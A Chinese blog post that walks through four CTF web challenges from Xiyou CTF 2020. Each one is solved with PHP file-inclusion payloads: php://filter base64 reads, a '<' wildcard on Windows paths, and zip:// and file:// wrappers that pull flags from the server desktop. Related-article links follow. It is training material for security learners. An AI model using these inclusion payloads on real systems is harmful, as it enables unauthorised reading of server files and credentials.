西邮ctf2020 web之文件包含解析

最新推荐文章于 2022-10-22 02:44:07 发布
最新推荐文章于 2022-10-22 02:44:07 发布
阅读量2.5k 收藏 3
点赞数 7
分类专栏: 2020那些做过的ctf 文章标签: php web 信息安全 安全 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145452/article/details/109498277
版权

比赛地址:http://39.97.182.97/

这四道考题都是利用的php伪协议 参考php伪协议,利用文件包含漏洞

第一题:http://watcem.top/wangzhan/27.php

在这里插入图片描述直接构造

http://watcem.top/wangzhan/27.php?file=flag.txt

得到flag
在这里插入图片描述

第二题:http://watcem.top/wangzhan/26.php

在这里插入图片描述
尝试构造 http://watcem.top/wangzhan/26.php?file=flag.php
发现需要用base64来解码
在这里插入图片描述使用php://filter构造

http://watcem.top/wangzhan/26.php?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base64加密过的字符串
在这里插入图片描述
base64解密得到flag
flag{fa8a8853b970c0f82bda58648ce1292a}

第三题:http://watcem.top/ctf/2/2.php

这题好**难 刚开始做没思路还是问的大佬才写出来

在这里插入图片描述题中提示flag在桌面,然后试图构造桌面路径

http://watcem.top/ctf/2/2.php?file=C:\Users\Administrator\Desktop\flag.<

之后在页面上发现回显,是.7z文件
在这里插入图片描述

注:这里有一个知识点 PHP中的(<) 相当于通配符符号(*)
在这里插入图片描述确定是.7z文件后,重新构造url

http://watcem.top/ctf/2/2.php?file=zip://C:\Users\Administrator\Desktop\flag.zip%23flag.txt

%23是#,经过转义在win上就要用%23
得到flag
在这里插入图片描述我好菜阿巴阿巴

第四题:http://watcem.top/ctf/3/3.php

发现页面是这个,甜甜的文件- -
在这里插入图片描述

2333太甜了
在这里插入图片描述构造 查找在桌面上的含有flag的文件

http://watcem.top/ctf/3/3.php?file=C:\Users\Administrator\Desktop\flag.<

得到回显 可以看到l.7z文件中含有flag.txt文本
在这里插入图片描述再构造,尝试打开flag.txt
构造一个发现没反应http://watcem.top/ctf/3/3.php?file=C:\Users\Administrator\Desktop\flag.7z%23flag.txt
试试base64解码

http://watcem.top/ctf/3/3.php?file=php://filter/convert.base64-encode/resource=file://C:\Users\Administrator\Desktop\flag.7z

页面下方显示一串字符~

N3q8ryccAATAe6mrIAAAAAAAAABqAAAAAAAAADAECf7cQ+YDVIG3ANMRbxs5ucbqTnBjZLGyzsSyPyqWlpRLnwEEBgABCSAABwsBAAIkBvEHAQpTB+KCpw0d1h3bISEBAAEADBgUAAgKAbRFbLcAAAUBGQkAAAAAAAAAAAAREwBmAGwAYQBnAC4AdAB4AHQAAAAZABQKAQDAKZRq7KbWARUGAQAgAAAAAAA=

base64解码发现没解出来,艹(一种植物)
把他们扔到010editor中,使用DecodeBase64脚本解码
在这里插入图片描述保存为1.7z 打开发现有密码
在这里插入图片描述看题上提示是3位数 纯数字密码,随便试下发现密码是123,当然也可以爆破 打开flag.txt 得到flag
在这里插入图片描述
题太难了,我是five,本人很菜,如果有写的不对的地方欢迎大佬们评论区留言指正
参考链接:https://www.cnblogs.com/-mo-/p/11736445.html
https://blog.csdn.net/qq_41289254/article/details/81388343?utm_source=app

落雪wink
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 13
    评论
专栏目录
CTF之二维码扫描.7z
12-02
CTF入门之二维码扫描神器,支持二维码修复
ctf7z文件爆破
weixin_45439432的博客
12-28 3889
给了一个7z文件爆破,提示纯数字4位 用工具即可 http://soft.rubypdf.com/software/rarcrack Linux版windows版都有,只是不能选择密码类型 这个也是可以的,可以选择密码类型纯数字4位 http://www.xz7.com/downinfo/236156.html 解压是一个二维码 微信扫一扫,没啥技术含量,送分题 ...
CTF 关于linux 7z解压的一点trick
a3320315的博客
06-19 1154
示例 假如我们可以任意文件上传,但是后缀拼接了一个hash256(要求是上传一个7z压缩文件,因为题目对应的功能是解压后缀为7z的文件) 1、这个时候我们可以在文件名后面加一个/ 2、此时我们的结构为filename.zip/hash256 3、虽然filename.zip是一个目录,而上传的内容在hash256文件中,但是Linux的特性支持直接解压一个文件夹,只要文件夹里面含有7z的压缩文件(即有一个7z文件格式的文件) 总结 类似的trick还有php可以执行打包文件,详情见链接 ...
CTF内存取证三项.7z
11-16
CTF取证分析赛题,对学习有很大帮助。
CTF】网鼎杯(白虎组)
网络安全从业者的学习笔记
08-27 2139
人工解码:旗帜左大括号地二一一二九二三杠七八地六杠四零六四杠九七七细杠必七三二九七地细四四九一右大括号。下载附件是个压缩文件,里面的内容被设置了密码,估计是利用csv的信息,解压flag.7z得到flag。最后用其解码后的hex,使用cmd5解密得到解压的密码。解密flag.7z后得到一个文本,里面是一串韩文。打开csv,看到密码,且为base64编码。使用gb18030汉字编码,得到flag。尝试解码,但是显示的信息似乎没有啥用途。爆破密码,是个纯数字的八位数。...
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件上传漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
ctfhub web全部做题记录(持续跟新)
01-08
【总结】在CTF Web挑战中,了解信息泄露、备份文件、源码解析、文件后缀、vim缓存、版本控制、弱口令、SQL注入、文件上传漏洞等概念至关重要。掌握这些技能可以帮助参赛者在比赛中发现并利用安全漏洞,获取flag。...
信息安全_.第六期.CTF.Web之Vulnhub靶场.课件资料.pptx
08-14
CTF Web部分主要关注Web应用程序的安全,涉及的知识点包括但不限于Web服务器配置、编程语言漏洞、数据库交互安全、文件上传漏洞、XSS跨站脚本、CSRF跨站请求伪造等。无论是初学者还是经验丰富的选手,都能在CTF中...
De1CTF2020:De1CTF2020
02-18
例如,可能包含HTML页面用于模拟Web服务,JavaScript文件可能隐藏了挑战的入口或者解密算法,甚至可能存在加密的数据或混淆的代码需要逆向工程来解析。此外,可能还会有README或者其他文档来引导玩家理解任务目标和...
对文件反转、倒置的工具,解决CTF和生活中的文件处理问题
最新发布
12-29
在网络安全和信息技术领域,尤其是参与CTF(Capture The Flag)竞赛的过程中,经常遇到需要处理和分析各种文件的情况。"对文件反转、倒置的工具"是这类问题的一个解决方案,它可以帮助参赛者或IT专业人士在解密、...
CTFer必备的解密工具包.7z
05-28
CTFer必备的解密工具包,方便快捷又实用。包括各种解密工具的集合,Ascii、k8、MD5计算器、JPocketKnife、彩虹表工具、密码机器、摩斯密码翻译器、莫尔斯码学习训练工具、小葵多功能转换工具、Ashdict、cryptosearcher、hash密纹识别、jother、JS混淆、rot13、RSA等等小工具,
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
CTF工具合集
04-09
CTF工具合集包括了CTF相关的各种工具,包括逆向,解密,WEB,密码学等等,相当有用,可以方便地准备各种CTF比赛
CTFCrackTools.7z
08-24
CTFCrackTools 包括各种编码解码功能,可以满足ctf比赛时编解码任务。。。
7z apache解析漏洞_任意文件上传CTF20关
weixin_35517357的博客
01-13 345
upload-labs一个帮你总结所有类型的上传漏洞的靶场文件上传靶机下载地址:https://github.com/c0ny1/upload-labs服务端检查内容 2、 3、 4 、需要结合文件包含漏洞。黑名单基本都可绕过。最不安全。pass-01 客户端绕过pass-02 把以.php结尾的小马改为以.jpg|.png|.gif结尾,用burpsuite抓包,在把.jpg|.pn...
CTF--zip压缩包相关
xuqi7
05-09 1万+
CTF–zip压缩包相关0x00 前言 ctf的压缩包也很常出现,全是加密的压缩包的能恶心死,今天就来看下zip压缩包的东西 0x01 伪加密 之前写过一个python的zip伪加密处理脚本,可以参照那个里面的方法 http://blog.csdn.net/xuqi7/article/details/59120054 其实有一种更简单的方法:7z,这个神奇的压缩软件无视伪加密,可以直接
CTF-入门四(续)
realstarstarli的博客
05-10 765
CTF-入门四(续) 继续记录上周未完成的bugku杂项题,最开始那两题容量比较大所以剩下的就放在这里了,那就开始吧~~ (3)多彩 这道题老实说我没有解出来,网上的wp我也看了,也没有详细的,这里先写在这里,等真正解决的时候在补上。 会拿到一张图片 万能开头file/binwalk/foremost/LSB隐写 最后用stegsolve.jar工具分析LSB隐写,得到了pk的压缩文件信息保存为.zip文件 解压,发现需要密码 Advanced Archive Password Recovery好像没用,
攻防_漏洞_文件包含_文件包含漏洞详解
redglare的博客
10-22 4070
文件包含漏洞详解
CTFweb学习记录 -- 文件包含
热门推荐
lifanxin的博客
05-11 1万+
文件包含概述常见文件包含函数和原理本地文件包含远程文件包含总结 概述   后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,因此该过程也就被称为文件包含文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。 常见文件包含函数和原理 # php include() // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行 require() // 程序运行就
2018强网杯CTF Web挑战解析:绕过与解密
2018年的强网杯线上赛Web部分包含了一系列不同难度的题目,这些题目可能涉及到SQL注入、XSS攻击、文件包含漏洞等常见Web安全问题。 第一层Web签到题目中,题目设计了一个条件判断,要求`param1`与`param2`不相等,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值